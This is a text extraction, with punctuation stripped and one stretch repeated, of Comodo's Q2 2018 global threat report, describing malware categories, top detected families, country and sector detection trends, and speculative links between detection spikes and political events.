Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
